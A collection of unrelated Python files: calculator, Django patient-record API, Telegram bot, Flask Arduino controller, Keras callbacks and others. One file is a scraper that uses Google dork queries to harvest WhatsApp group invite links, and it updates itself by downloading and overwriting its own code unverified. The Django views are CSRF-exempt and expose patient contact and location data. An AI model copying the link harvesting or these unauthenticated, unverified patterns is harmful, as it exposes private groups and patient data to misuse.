({'meta': [{'show_made_with_on_exit': ['must be of boolean type']}], 'screens': ['Screens must not link to themselves.']}, # noqa
"Please amend these schema errors in your blueprint:\nmeta.show_made_with_on_exit: Must be of boolean type.\nscreens: Screens must not link to themselves."), # noqa
])
def test_invalid_schema_error(validator_errors: dict, err_message: str):
with pytest.raises(InvalidSchemaError) as excinfo:
raise InvalidSchemaError(validator_errors)
err: InvalidSchemaError = excinfo.value
assert err.message == err_message
|
import re
import argparse
from typing import Optional, List
from dataclasses import dataclass
from lark import Lark, Transformer, v_args
USAGE = "A command line calculator"
@dataclass
class Token:
name: str
value: str
calc_grammar = """
?start: sum
| NAME "=" sum -> assign_var
?sum: product
| sum "+" product -> add
| sum "-" product -> sub
?product: atom
| product "*" atom -> mul
| product "/" atom -> div
?atom: NUMBER -> number
| "-" atom -> neg
| NAME -> var
| "(" sum ")"
%import common.CNAME -> NAME
%import common.NUMBER
%import common.WS_INLINE
%ignore WS_INLINE
"""
@v_args(inline=True) # Affects the signatures of the methods
class CalculateTree(Transformer):
from operator import add, sub, mul, truediv as div, neg
number = float
def __init__(self):
self.vars = {}
def assign_var(self, name, value):
self.vars[name] = value
return value
def var(self, name):
try:
return self.vars[name]
except KeyError:
raise Exception("Variable not found: %s" % name)
def calculate(formula):
calc_parser = Lark(calc_grammar, parser='lalr',
transformer=CalculateTree())
result = calc_parser.parse(formula)
return result
def main():
parser = argparse.ArgumentParser("calc")
parser.add_argument("formula", action="store")
args = parser.parse_args()
formula = args.formula
result = calculate(formula)
if result is not None:
print(result)
if __name__ == '__main__':
main()
|
import abc
from abc import ABC
class Parent(ABC):
# __metaclass__ = abc.ABCMeta // this appears only to be necessary Python <= 3.4
def __init__(self):
print("__init__: Parent")
def do_template(self):
print("template method leads to {}".format(self.template_method()))
@abc.abstractmethod
def template_method(self):
"""This should not be subclassed if not over riden if ABC is doing its work"""
return
class ClassA(Parent):
def __init__(self):
# super(ClassA, self).__init__()
super().__init__() # super() is simpler in Python 3
def template_method(self):
return "ClassA.template_method"
class ClassB(Parent):
def __init__(self):
# super(ClassB, self).__init__()
super().__init__() # super() is simpler in Python 3
def template_method(self):
return "ClassB.template_method"
class DoesNotInstantiateThanksToABC(Parent):
def __init__(self):
print("DoesNotInstantiateThanksToABC: __init__")
# super(DoesNotInstantiateThanksToABC, self).__init__()
super().__init__() # super() is simpler in Python 3
if __name__ == "__main__":
a = ClassA()
a.do_template()
b = ClassB()
b.do_template()
parent = Parent() # blows up in Python 3.6.9
parent.do_template()
parent.template_method()
fails = DoesNotInstantiateThanksToABC()
|
import json
import re
from django.views.decorators.csrf import csrf_exempt
from django.http import HttpResponse
from django.contrib.auth import authenticate, login
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.auth.models import User
from django.db import IntegrityError
from sample.forms import NewPatientForm, NewCaseForm
from sample.models import Patient
from django.utils.importlib import import_module
from django.contrib.auth import get_user
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.contrib.auth import SESSION_KEY, BACKEND_SESSION_KEY, load_backend
from sample.models import Case, Comment, CommentGroup, Scan
from django.utils import timezone
from base64 import b64decode
from django.core.files.base import ContentFile
from django.db.models import Q
@csrf_exempt
def process_login(request):
json_data = json.loads(request.raw_post_data)
try:
username = json_data['username']
password = json_data['password']
except KeyError:
json_response = json.dumps({"success": "false",
"type": "badRequest"})
return HttpResponse(json_response, mimetype='application/json')
try:
User.objects.get(username=username)
except ObjectDoesNotExist:
json_response = json.dumps({"success": "false",
"type": "invalidUser"})
return HttpResponse(json_response, mimetype='application/json')
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
try:
login(request, user)
json_response = json.dumps({"success": "true",
"type": "worker",
"sessionid":
request.session.session_key})
return HttpResponse(json_response, mimetype='application/json')
except ObjectDoesNotExist:
json_response = json.dumps({"success": "false",
"type": "existence"})
return HttpResponse(json_response, mimetype='application/json')
else:
json_response = json.dumps({"success": "false", "type": "active"})
return HttpResponse(json_response, mimetype='application/json')
else:
# bad password
json_response = json.dumps({"success": "false", "type": "password"})
return HttpResponse(json_response, mimetype='application/json')
def is_worker(request):
json_data = json.loads(request.raw_post_data, strict=False)
engine = import_module(settings.SESSION_ENGINE)
try:
session = engine.SessionStore(json_data['session_key'])
except KeyError:
json_response = json.dumps({"success": "false",
"type": "badRequest"})
return HttpResponse(json_response, mimetype='application/json')
try:
worker = session[SESSION_KEY]
sample_path = session[BACKEND_SESSION_KEY]
sample = load_backend(sample_path)
user = sample.get_user(worker) or AnonymousUser()
except KeyError:
user = AnonymousUser()
if user.is_authenticated():
try:
if user.worker:
json_data['worker'] = user.worker
return json_data
except:
return False
@csrf_exempt
def create_new_patient_m(request):
data = is_worker(request)
if not data:
json_response = json.dumps({"success": "false",
"type": "notWorker"})
return HttpResponse(json_response, mimetype='application/json')
form = NewPatientForm(data)
if form.is_valid():
first_name = form.cleaned_data['first_name']
last_name = form.cleaned_data['last_name']
gps_coordinates = form.cleaned_data['gps_coordinates']
address = form.cleaned_data['address']
date_of_birth = form.cleaned_data['date_of_birth']
phone_number = form.cleaned_data['phone_number']
health_id = form.cleaned_data['health_id']
photo_link = form.cleaned_data['photo_link']
sex = form.cleaned_data['sex']
email = form.cleaned_data['email']
try:
patient = Patient(
first_name=first_name,
last_name=last_name,
gps_coordinates=gps_coordinates,
address=address,
date_of_birth=date_of_birth,
phone=phone_number,
health_id=health_id,
gender=sex,
email=email,
photo_link=photo_link)
patient.save()
except IntegrityError:
json_response = json.dumps({"success": "false",
"type": "IntegrityError"})
return HttpResponse(json_response, mimetype='application/json')
json_response = json.dumps({"success": "true",
"type": "newPatient", "patient_id":
str(patient.id)})
return HttpResponse(json_response, mimetype='application/json')
else:
json_response = json.dumps({"success": "false",
"type": "invalidForm"})
return HttpResponse(json_response, mimetype='application/json')
@csrf_exempt
def display_patient_m(request):
data = is_worker(request)
if not data:
json_response = json.dumps({"success": "false",
"type": "notWorker"})
return HttpResponse(json_response, mimetype='application/json')
try:
patient = Patient.objects.filter(id=data['patient_id'])[0]
except KeyError:
json_response = json.dumps({"success": "false",
"type": "KeyError"})
return HttpResponse(json_response, mimetype='application/json')
date_of_birth = patient.date_of_birth
if date_of_birth is None:
date_of_birth = ""
json_response = json.dumps({
'photo_link': patient.photo_link,
'firstName': patient.first_name,
'lastName': patient.last_name,
'patient_id': patient.id,
'gender': patient.gender,
'date_of_birth': date_of_birth.strftime('%Y-%m-%d'),
'gps_coordinates': patient.gps_coordinates,
'health_id': patient.health_id,
'address': patient.address,
'phone': patient.phone,
'email': patient.email})
return HttpResponse(json_response, mimetype='application/json')
@csrf_exempt
def create_new_case_m(request):
data = is_worker(request)
if not data:
json_response = json.dumps({"success": "false",
"type": "notWorker"})
return HttpResponse(json_response, mimetype='application/json')
form = NewCaseForm(data)
worker = data['worker']
if form.is_valid():
patient_id = form.cleaned_data['patient']
comments = form.cleaned_data['comments']
priority = form.cleaned_data['priority']
try:
patient = Patient.objects.filter(id=patient_id)[0]
comment = Comment(
author=worker.user,
text=comments,
time_posted=timezone.now())
comment.save()
comment_group = CommentGroup()
comment_group.save()
comment_group.comments.add(comment)
case = Case(
patient=patient,
submitter_comments=comment_group,
priority=priority,
status=1,
submitter=worker,
date_opened=timezone.now())
case.save()
except IntegrityError:
json_response = json.dumps({"success": "false",
"type": "IntegrityError"})
return HttpResponse(json_response, mimetype='application/json')
json_response = json.dumps({"success": "true",
"type": "newCase",
"case_id": str(case.id)})
return HttpResponse(json_response, mimetype='application/json')
else:
json_response = json.dumps({"success": "false",
"type": "invalidForm"})
return HttpResponse(json_response, mimetype='application/json')
@csrf_exempt
def display_case_m(request):
''' Displays the specified case. '''
data = is_worker(request)
if not data:
json_response = json.dumps({"success": "false",
"type": "notWorker"})
return HttpResponse(json_response, mimetype='application/json')
try:
case = Case.objects.filter(id=data['case_id'])[0]
except KeyError:
json_response = json.dumps({"success": "false",
"type": "KeyError"})
return HttpResponse(json_response, mimetype='application/json')
json_response = json.dumps({"success": "true",
"type": "newCase",
'firstName': str(case.patient.first_name),
'lastName': str(case.patient.last_name),
'patient_id': str(case.patient.id),
'gender': str(case.patient.gender),
'date_of_birth':
str(case.patient.date_of_birth),
'health_id': str(case.patient.health_id),
'priority': str(case.priority)})
return HttpResponse(json_response, mimetype='application/json')
@csrf_exempt
def upload_image_m(request):
data = is_worker(request)
if not data:
json_response = json.dumps({"success": "false",
"type": "notWorker"})
return HttpResponse(json_response, mimetype='application/json')
try:
case = Case.objects.filter(id=data['case_id'])[0]
except KeyError:
json_response = json.dumps({"success": "false",
"type": "KeyError"})
return HttpResponse(json_response, mimetype='application/json')
try:
scan = Scan(
patient=case.patient)
scan.save()
except IntegrityError:
scan.delete()
json_response = json.dumps({"success": "false",
"type": "IntegrityError"})
return HttpResponse(json_response, mimetype='application/json')
try:
image_data = b64decode(data['image_string'])
scan.file = ContentFile(image_data, "test.png")
scan.save()
#comment.scans.add(scan)
case.scans.add(scan)
#case.scan = scan
#case.save()
except IntegrityError:
json_response = json.dumps({"success": "false",
"type": "IntegrityError"})
return HttpResponse(json_response, mimetype='application/json')
json_response = json.dumps({"success": "true",
"type": "uploadSuccess"})
return HttpResponse(json_response, mimetype='application/json')
@csrf_exempt
def display_patient_cases_m(request):
''' Displays all cases related to a patient. '''
data = is_worker(request)
if not data:
json_response = json.dumps({"success": "false",
"type": "notWorker"})
return HttpResponse(json_response, mimetype='application/json')
try:
patient = Patient.objects.filter(id=data['patient_id'])[0]
cases = Case.objects.filter(patient=patient)
except KeyError:
json_response = json.dumps({"success": "false",
"type": "KeyError"})
return HttpResponse(json_response, mimetype='application/json')
json_response = json.dumps({"success": "true",
"type": "patientCases",
"cases": create_cases_json(cases)})
return HttpResponse(json_response, mimetype='application/json')
def create_cases_json(case_objects):
case = {}
cases = []
for case_object in case_objects:
case['firstName'] = str(case_object.patient.first_name)
case['lastName'] = str(case_object.patient.last_name)
case['patient_id'] = str(case_object.patient.id)
case['gender'] = str(case_object.patient.gender)
case['date_of_birth'] = str(case_object.patient.date_of_birth)
case['health_id'] = str(case_object.patient.health_id)
if str(case_object.priority) == "10":
case['priority'] = "High"
elif str(case_object.priority) == "20":
case['priority'] = "Medium"
elif str(case_object.priority) == "30":
case['priority'] = "Low"
case['case_id'] = str(case_object.id)
case['submitter'] = str(case_object.submitter)
case['creation_date'] = str(case_object.date_opened)
cases.append(case)
case = {}
return cases
# Thanks to http://julienphalip.com/post/2825034077/adding-search-to-a-django-site-in-a-snap
def normalize_query(query_string,
findterms=re.compile(r'"([^"]+)"|(\S+)').findall,
normspace=re.compile(r'\s{2,}').sub):
''' Splits the query string in invidual keywords, getting rid of unecessary
spaces and grouping quoted words together.
Example:
>>> normalize_query(' some random words "with quotes " and
spaces')
['some', 'random', 'words', 'with quotes', 'and', 'spaces']
'''
return [normspace(' ', (t[0] or t[1]).strip()) for t in
findterms(query_string)]
def get_query(query_string, search_fields):
''' Returns a query, that is a combination of Q objects. That combination
aims to search keywords within a model by testing the given search
fields.
'''
query = None # Query to search for every search term
terms = normalize_query(query_string)
for term in terms:
or_query = None # Query to search for a given term in each field
for field_name in search_fields:
q = Q(**{"%s__icontains" % field_name: term})
if or_query is None:
or_query = q
else:
or_query = or_query | q
if query is None:
query = or_query
else:
query = query & or_query
return query
@csrf_exempt
def search_patients(request):
query_string = ''
found_entries = None
data = is_worker(request)
if not data:
json_response = json.dumps({"success": "false",
"type": "notWorker"})
return HttpResponse(json_response, mimetype='application/json')
if ('q' in data) and data['q'].strip():
query_string = data['q']
entry_query = get_query(query_string, ['first_name', 'last_name',
'health_id',])
found_entries = Patient.objects.filter(entry_query)
if (len(found_entries) > 0):
json_response = json.dumps({"success": "true",
"type": "search",
"result": create_patients_json(found_entries)})
return HttpResponse(json_response, mimetype='application/json')
else:
json_response = json.dumps({"success": "false",
"type": "search",
"result": "No result found"})
return HttpResponse(json_response, mimetype='application/json')
def create_patients_json(patient_objects):
patient = {}
patients = []
for patient_object in patient_objects:
patient['firstName'] = str(patient_object.first_name)
patient['lastName'] = str(patient_object.last_name)
patient['patient_id'] = str(patient_object.id)
patient['gender'] = str(patient_object.gender)
patient['date_of_birth'] = str(patient_object.date_of_birth)
patient['health_id'] = str(patient_object.health_id)
patient['email'] = str(patient_object.email)
patient['gps'] = str(patient_object.gps_coordinates)
patient['address'] = str(patient_object.address)
patient['phone'] = str(patient_object.phone)
patients.append(patient)
patient = {}
return patients
|
"""Builds elevation graph between one or more points.
Module searches route between two coordinate points, draws a
elevation graph and constructs a summary. Route and elevation are fetched
using Google Maps APIs. Graph is created from fetched elevation points and
drawn with Matplotlib.
Usage:
Find elevation from Helsinki - Turku - Tampere
/ele helsinki; turku; tampere
/ele
Helsinki
via
Turku
tampere
You can replace any or all cities with location
"""
import json
import matplotlib
# yapf: disable
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
from geopy.geocoders import GoogleV3, Nominatim
from PIL import Image
from telegram import ChatAction, Location, ParseMode
try:
# For Python 3.0 and later
from urllib.request import urlopen
from urllib.parse import urlencode
from configparser import ConfigParser
except ImportError:
# Fall back to Python 2's urllib
from urllib import urlopen
from urllib import urlencode
from ConfigParser import ConfigParser
# yapf: enable
config = ConfigParser()
config.read('telepybot.conf')
api_key = config.get('elevation', 'gmapsApiKey')
def handle_update(bot, update, update_queue, **kwargs):
"""Process message from update and send elevation infromation.
This is the main function that modulehander calls.
Args:
bot (telegram.Bot): Telegram bot itself
update (telegram.Update): Update that will be processed
update_queue (Queue): Queue containing all incoming and unhandled updates
kwargs: All unused keyword arguments. See more from python-telegram-bot
"""
chat_id = update.message.chat_id
origin = None
destination = None
via_locs = []
try:
query = update.message.text.split(' ', 1)[1]
origin = query
try:
# TODO: Add possibility to add 'via' by chaining locations with ';'
locs = query.split(';')
origin = locs[0]
if len(locs) > 1:
destination = locs[-1].strip()
via_locs = locs[1:-1]
via_locs = [x.strip() for x in via_locs]
except ValueError:
pass
except IndexError:
pass
next_is_via = False
while not origin or not destination:
text = ('Send location or place name')
bot.sendMessage(chat_id=chat_id, text=text)
update = update_queue.get()
if update.message.location:
location = update.message.location
elif update.message.text != '':
if update.message.text.startswith('/'):
update_queue.put(update)
return
if update.message.text.lower().strip() == 'via':
bot.sendMessage(chat_id=chat_id, text='Send via location')
next_is_via = True
continue
geolocator = GoogleV3(api_key=api_key)
location = geolocator.geocode(update.message.text)
if next_is_via:
next_is_via = False
if not origin:
text = "Via can't be before origin. Quitting"
bot.sendMessage(chat_id=chat_id, text=text)
return
via_locs.append('{},{}'.format(location.latitude,
location.longitude))
elif origin:
destination = '{},{}'.format(location.latitude, location.longitude)
else:
origin = '{},{}'.format(location.latitude, location.longitude)
bot.sendChatAction(chat_id, action=ChatAction.TYPING)
report, graph = elevate(origin, destination, via_locs, 'best')
bot.sendMessage(chat_id, report, parse_mode=ParseMode.MARKDOWN)
# bot.sendMessage(chat_id, 'If you want graph, type "graph"')
with open(graph, 'rb') as photo:
bot.sendChatAction(chat_id, action=ChatAction.UPLOAD_PHOTO)
bot.sendPhoto(chat_id, photo)
def elevate(origin, destination, via_locs, plot_mode):
"""Get elevation data from Google Maps Elevation api and construct a report
Receives origin, destination and possibly intermediate location points,
finds a route using Google Maps Directions API. Gets altitude points for
that route from Google Maps Elevation API. Calculates a few statistics and
sends them to user along with a graph showing altitude along the route.
Args:
origin (str): Origin coordinates, e.g. "60.161928,24.951688"
destination (str): Destination coordinates, e.g. "61.504956,23.743120"
via_locs (list): Additional intermediate coordinates
plot_mode (str): Preset mode for graph
"""
params = {'origin': origin.encode('utf8'),
'destination': destination.encode('utf8'),
'waypoints': '|'.join('via:' + str(x) for x in via_locs),
'key': api_key,
'mode': 'bicycling',
'avoid': 'highways'}
cycling = True
url_params = urlencode(params)
url = 'https://maps.googleapis.com/maps/api/directions/json?' + url_params
cycle_route = urlopen(url).read().decode('utf-8')
route_json = json.loads(cycle_route)
# Since some countries don't have cycling routes, fall back to walking
if route_json['status'] != "OK":
# Change cycling to walking
params['mode'] = 'walking'
cycling = False
url_params = urlencode(params)
url = 'https://maps.googleapis.com/maps/api/directions/json?' + url_params
walking_route = urlopen(url).read().decode('utf-8')
route_json = json.loads(walking_route)
if route_json['status'] != "OK":
return "Could not find a route between the locations", None
encoded_polyline = route_json['routes'][0]['overview_polyline']['points']
distance = route_json['routes'][0]['legs'][0]['distance']['value'] / float(
1000)
params = {'path': 'enc:' + encoded_polyline,
'samples': 128,
'key': api_key}
url_params = urlencode(params)
url = 'https://maps.googleapis.com/maps/api/elevation/json?' + url_params
elevation_data = urlopen(url).read().decode('utf-8')
elevation_json = json.loads(elevation_data)
elevation_points = []
closest_to_via_locs = []
for point in elevation_json['results']:
elevation_points.append(point['elevation'])
filename = build_plot(distance, elevation_points, plot_mode)
# Choose correct mode for Google Maps link
if cycling:
mode = '1'
else:
# walking
mode = '2'
# Construct Google Maps link
gmaps = 'https://www.google.com/maps/dir/%s/%s/%s/data=!4m2!4m1!3e%s' % (
origin, '/'.join(str(x) for x in via_locs), destination, mode)
# Calculate total ascent and descent
ascent, descent = calculate_route_stats(elevation_points)
report = ("From %s to %s\nDistance: %s km\nTotal ascent: %sm\n"
"Total descent: %sm\n[Gmaps route link](%s)" %
(origin, destination, "%.2f" % round(distance, 2), str(ascent),
str(descent), gmaps))
return report, filename
def build_plot(distance, elevation_points, plot_mode):
"""Build the elevation graph using matplotlib."""
if plot_mode == 'tall':
custom_dpi = 75
size = (600 / custom_dpi, 200 / custom_dpi)
convert_to_jpg = True
elif plot_mode == 'best':
custom_dpi = None
size = None
convert_to_jpg = False
else:
custom_dpi = 75
size = (600 / custom_dpi, 200 / custom_dpi)
convert_to_jpg = True
plt.style.use('seaborn-darkgrid')
# plt.style.use('ggplot')
fig = plt.figure(figsize=size, dpi=custom_dpi)
ax = fig.add_subplot(111)
plt.ylabel('Elevation (m)')
plt.xlabel('Distance (km)')
x = np.linspace(0, distance, len(elevation_points))
y = elevation_points
ax.plot(x, y)
plt.tight_layout()
fig.savefig('.tmp/latest_elevation.png', dpi=custom_dpi)
# Close plt window, figure and axis
plt.close()
if convert_to_jpg:
Image.open('.tmp/latest_elevation.png').save(
'.tmp/latest_elevation.jpg', 'JPEG')
return '.tmp/latest_elevation.jpg'
else:
return '.tmp/latest_elevation.png'
def calculate_route_stats(elevation_points):
"""Calculate few statistics from elevation points."""
total_ascent = 0
total_descent = 0
curr = elevation_points[0]
for point in elevation_points:
if point > curr:
total_ascent += point - curr
else:
total_descent += curr - point
curr = point
return int(total_ascent), int(total_descent)
def parse_location(loc, destination=None):
"""Convert location to string, e.g. "60.161928,24.951688".
"""
if isinstance(loc, Location):
return str(loc.latitude) + ',' + str(loc.longitude)
elif destination:
return str(loc) + ',' + str(destination)
|
import time
import sys
import re,os
import urllib.request,urllib.parse,threading
from datetime import datetime
try:
from googlesearch import search
except ImportError:
print("[!] \"google\" Module is unavailable. ")
print(" Please Install it by using:")
print("\n python3 -m pip install google")
exit()
SAVE = "Result_%s.txt" % datetime.now().strftime('%Y_%m_%d-%H_%M_%S')
availabledom = ["pastebin",
"throwbin",
"pastr",
"pasteio",
"paste2",
"paste"]
site_urls = ["https://whatsgrouplink.com/",
"https://whatsappgroups.app/job-alerts-whatsapp-group-links/",
"https://whatsappgroups.app/whatsapp-group-links/",
"https://whatsappgroups.app/pubg-whatsapp-group-links-india/",
"https://whatsappgroups.app/funny-jokes-whatsapp-group-links/",
"https://allinonetrickz.com/new-whatsapp-groups-invite-links/"]
def linkcheck(url):
print("\nTrying URL:", url, end='\r')
try:
r = urllib.request.urlopen(url)
except:
return ('','')
if(r.getcode() != 404):
r = r.read().decode("utf-8")
p = r.find("</h2>")
name=r[r.rfind("\">", 0, p) + 2:p]
if name.strip() == '':
return ('','')
return (name,url)
return ('','')
def pad(s):
if not "invite" in s:
p = s.find(".com")
s = s[:p + 4] + "/invite" + s[p + 4:]
return s
def scrape(txt):
if type(txt) == type(b''):
txt = txt.decode("utf-8")
match = []
match2 = re.findall(r"(https:\/\/chat\.whatsapp\.com\/(invite\/)?[a-zA-Z0-9]{22})", txt)
match = [item[0] for item in match2]
match = list(set(match))
for lmt in match:
lmt = pad(lmt)
nm, url = linkcheck(lmt)
if nm != '':
print("[i] Group Name: " + (nm + ' ' * (65-len(nm))))
print("[i] Group Link: ", url)
f = open(SAVE, "ab")
f.write(str.encode(nm + " : " + url + '\n'))
f.close()
def start(index):
print("[*] Initializing...")
if index >= len(availabledom):
return
query = "intext:chat.whatsapp.com inurl:" + availabledom[index]
print("[*] Finding Results from Google ...")
for url in search(query, tld="com", num=10, stop=None, pause=2):
txt = urllib.request.urlopen(url).read().decode("utf8")
scrape(txt)
def scrap_from_link(index):
print("[*] Initializing...")
if index >= len(site_urls):
return
r = urllib.request.urlopen(site_urls[index]).read().decode()
scrape(r)
def get_terminal_size(fallback=(80, 24)):
for i in range(0, 3):
try:
columns, rows = os.get_terminal_size(i)
except OSError:
continue
break
else:
columns, rows = fallback
return columns, rows
def main():
global SAVE
terminal_size = get_terminal_size()
if terminal_size[0] < 80:
print("""
__ __ __ __
/ _` |__) / \ | | |__) | \ /
\__> | \ \__/ \__/ | |___ |
""")
else:
print("""
________ ____ __ _____ ____ __
/ ___/ _ \/ __ \/ / / / _ \/ /\ \/ /
/ (_ / , _/ /_/ / /_/ / ___/ /__\ /
\___/_/|_|\____/\____/_/ /____//_/
""")
if len(sys.argv) >= 2:
if 'u' in sys.argv[1] or '-u' in sys.argv[1]:
print("[*] Updating, Please Wait...", end='\r')
try:
txt = urllib.request.urlopen("https://github.com/Lucia361/grouply/raw/master/grouply.py").read()
f = open(sys.argv[0], "wb")
f.write(txt)
f.close()
print("[$] Update Successful.")
print("[i] Run " + sys.argv[0] + " Again..")
except:
print("[!] Update Failed !!! ")
exit()
threads = []
print("""
1> Extract From Google
2> Extract From Group Sharing Sites [BEST]
3> Check From File
4> Update Grouply
""")
try:
inp = int(input("[#] Enter Selection: "))
except:
print("\t[!] Invalid Selection..")
exit()
if inp != 4:
newSave = str(input("[#] Enter Saving File (Default is Result.txt): "))
SAVE = "Result.txt" if newSave == '' else newSave
f = open(SAVE, 'w')
f.write("WhatsApp Group Links Extracted by Grouply \nGet it at https://github.com/Lucia361/grouply\r\n")
f.close()
if inp == 1:
for i in range(0, int(input("[#] Enter Threads Number(1-" + str(len(availabledom)) + "):- "))):
thread = threading.Thread(target=start, args=(i,))
thread.start()
threads.append(thread)
for i in threads:
i.join()
elif inp == 2:
for i in range(0, int(input("[#] Enter Threads Number(1-" + str(len(site_urls)) + "):- "))):
thread = threading.Thread(target=scrap_from_link, args=(i,))
thread.start()
threads.append(thread)
for i in threads:
i.join()
elif inp == 3:
path = input("[#] Enter Whatsapp Links File Path: ").strip()
if not os.path.isfile(path):
print("\t[!] No such file found...")
exit()
thn = int(input("[#] Enter Thread Numbers: "))
op = open(path, "rb").read().decode("utf-8")
op = op.count('\n') // thn
with open(path, "rb") as strm:
for i in range(thn - 1):
head = [next(strm) for x in range(op)]
thread = threading.Thread(target=scrape, args=(b'\n'.join(head),))
thread.start()
threads.append(thread)
thread = threading.Thread(target=scrape, args=(strm.read(),))
thread.start()
threads.append(thread)
for i in threads:
i.join()
elif inp == 4:
print("[*] Updating, Please Wait...", end='\r')
try:
txt = urllib.request.urlopen("https://github.com/Lucia361/grouply/raw/master/grouply.py").read()
f = open(sys.argv[0], "wb")
f.write(txt)
f.close()
print("[$] Grouply updated successfully")
print("[i] Run " + sys.argv[0] + " Again...")
except:
print("[!] Update Failed !!! ")
exit()
else:
print("[!] Invalid Selection...")
if __name__ == "__main__":
main()
|
import re
haystack = "Hello world"
needle = 'ello'
mo = re.search(needle, haystack)
print(mo)
# Does not work on python 3.6:
# assert isinstance(mo, re.Match)
assert mo.start() == 1
assert mo.end() == 5
assert re.escape('python.exe') == 'python\\.exe'
p = re.compile('ab')
s = p.sub('x', 'abcabca')
print(s)
assert s == 'xcxca'
idpattern = r'([_a-z][_a-z0-9]*)'
mo = re.search(idpattern, '7382 _boe0+2')
print(mo)
# TODO:
# assert mo.group(0) == '_boe0'
|
from rest_framework import routers, urlpatterns
from rest_framework.routers import DefaultRouter
from tasks.viewsets import UsersViewSet, TasksViewSet
router=DefaultRouter()
router.register(r'users', UsersViewSet, basename='users')
router.register(r'tasks', TasksViewSet, basename='tasks')
urlpatterns=router.urls
|
# a116_buggy_image.py
import turtle as trtl
# instead of a descriptive name of the turtle such as painter,
# a less useful variable name spider is used
spider= trtl.Turtle()
spider.pensize(40)
spider.circle(20) ## Create a spider body
leg_number = 6
leg_length = 70
leg_pos = 380 / leg_number
spider.pensize(5) ## Configure spider legs
n = 0
while (n < leg_number): ##Draw legs
spider.goto(0,0)
spider.setheading(leg_pos*n)
spider.forward(leg_length)
n = n + 1
spider.hideturtle()
wn = trtl.Screen()
wn.mainloop()
|
# ------------------------------------------------------------------------------
# name : api_server.js
# author : Noe Flatreaud (Retr0)
# description:
# simple API server for the IHC-controller project
# it provide an API url as well as a basic dashboard so you can
# use it every were by using the web browser.
# you can as well create a third-pary app and use the api url.
# ------------------------------------------------------------------------------
import serial
import threading
import time
from flask import *
app = Flask(__name__)
# ------------------------------------------------------------------------------
# Arduino Serial
# ------------------------------------------------------------------------------
arduino = serial.Serial(port='COM4', baudrate=9600, timeout=.1)
#def write_read(x):
# arduino.write(bytes(x, 'utf-8'))
# time.sleep(0.05)
# data = arduino.readline()
# return data
# ------------------------------------------------------------------------------
# Routes
# ------------------------------------------------------------------------------
# default route
@app.route('/')
def index():
return render_template('index.html')
# API route
@app.route('/api', methods=['GET'])
def api():
try:
output = int(request.args['output']);
value = int(request.args['value']);
print(bytes([output, value]))
except Exception as e:
data = "Oops Something went wrong !!<br> {0}".format(str(e))
return data, 413 # HTTP_413_REQUEST_ENTITY_TOO_LARGE
else:
data = "OK"
arduino.write(bytes([output, value]));
return data, 200 # HTTP_200_OK
# allow javascript index.js to be imported !
@app.route('/index.js')
def js():
return render_template('index.js')
def io_thread():
print("Started new Daemon")
while 1:
time.sleep(1)
#print("slept");
# ------------------------------------------------------------------------------
# Main
# ------------------------------------------------------------------------------
if __name__ == "__main__":
io = threading.Thread(target = io_thread, daemon = True)
io.start();
# run flask server
app.run(host='0.0.0.0')
|
import time
from datetime import timedelta
import numpy as np
from pytimeparse.timeparse import timeparse
from tensorflow import keras
from tensorflow import logging
from .save_and_load import save_model, save_last_epoch_number, save_best_info
class ModelSaver(keras.callbacks.Callback):
def __init__(self, model_name, period=1, verbose=0):
super().__init__()
if not isinstance(period, int):
raise TypeError('period should be int.')
if period <= 0:
raise ValueError('period should be at least 1.')
self.model_name = model_name
self.period = period
self.verbose = verbose
self.epochs_since_last_save = 0
def on_train_begin(self, logs=None):
# Allow instances to be re-used
self.epochs_since_last_save = 0
def on_epoch_end(self, epoch, logs=None):
self.epochs_since_last_save += 1
if self.epochs_since_last_save >= self.period:
self.epochs_since_last_save = 0
save_model(model_name=self.model_name, model=self.model, epoch=epoch,
does_overwrite=True, does_include_optimizer=True)
if self.verbose > 0:
print('Epoch %d: save the model "%s" successfully.' % (epoch + 1, self.model_name))
class EpochNumberSaver(keras.callbacks.Callback):
def __init__(self, model_name, verbose=0):
super().__init__()
self.model_name = model_name
self.verbose = verbose
def on_epoch_end(self, epoch, logs=None):
save_last_epoch_number(model_name=self.model_name, epoch=epoch)
if self.verbose > 0:
print('Epoch %d: save the epoch number successfully.' % (epoch + 1))
class BestInfoSaver(keras.callbacks.Callback):
def __init__(self, model_name, monitor='loss', mode='min', baseline=None, verbose=0):
super().__init__()
self.model_name = model_name
self.monitor = monitor
self.baseline = baseline
self.verbose = verbose
if mode is not None:
mode = mode.lower()
if mode not in ['min', 'max']:
logging.warning('BestInfoSaver mode %s is unknown, fallback to min mode.', mode)
mode = 'min'
if mode == 'min':
self.monitor_op = np.less
else:
self.monitor_op = np.greater
self.best = None
def on_train_begin(self, logs=None):
# Allow instances to be re-used
if self.baseline is not None:
self.best = self.baseline
else:
self.best = np.Inf
if self.monitor_op != np.less:
self.best = -self.best
def on_epoch_end(self, epoch, logs=None):
current = logs.get(self.monitor)
if current is None:
logging.warning('BestInfoSaver conditioned on metric `%s` '
'which is not available. Available metrics are: %s',
self.monitor, ','.join(list(logs.keys())))
return
if self.monitor_op(current, self.best):
self.best = current
save_best_info(model_name=self.model_name, epoch=epoch, monitor_name=self.monitor, monitor_value=self.best)
if self.verbose > 0:
print('Epoch %d: save best info successfully.' % (epoch + 1))
elif self.verbose > 0:
print('Epoch %d: %s did NOT improve from %s' % (epoch + 1, self.monitor, self.best))
class TimeLimiter(keras.callbacks.Callback):
def __init__(self, limit, verbose=0):
super().__init__()
if limit is None:
raise ValueError('TimeLimiter: limit cannot be None.')
self.limit = limit
self.verbose = verbose
self.train_begin_time = 0.
self.epoch_begin_time = 0.
self.epoch_avg_seconds = 0.
self.epoch_count = 0
self.stopped_epoch = 0
self.__parse_limit()
def on_train_begin(self, logs=None):
self.train_begin_time = time.time()
# Allow instances to be re-used
self.epoch_avg_seconds = 0.
self.epoch_count = 0
self.stopped_epoch = 0
def on_epoch_begin(self, epoch, logs=None):
self.epoch_begin_time = time.time()
def on_epoch_end(self, epoch, logs=None):
now = time.time()
epoch_seconds = now - self.epoch_begin_time
self.epoch_avg_seconds = (self.epoch_avg_seconds * self.epoch_count + epoch_seconds) / (self.epoch_count + 1)
self.epoch_count += 1
if now - self.train_begin_time + self.epoch_avg_seconds > self.limit:
self.stopped_epoch = epoch
self.model.stop_training = True
def on_train_end(self, logs=None):
if self.stopped_epoch > 0 and self.verbose > 0:
now = time.time()
et_seconds = now - self.train_begin_time
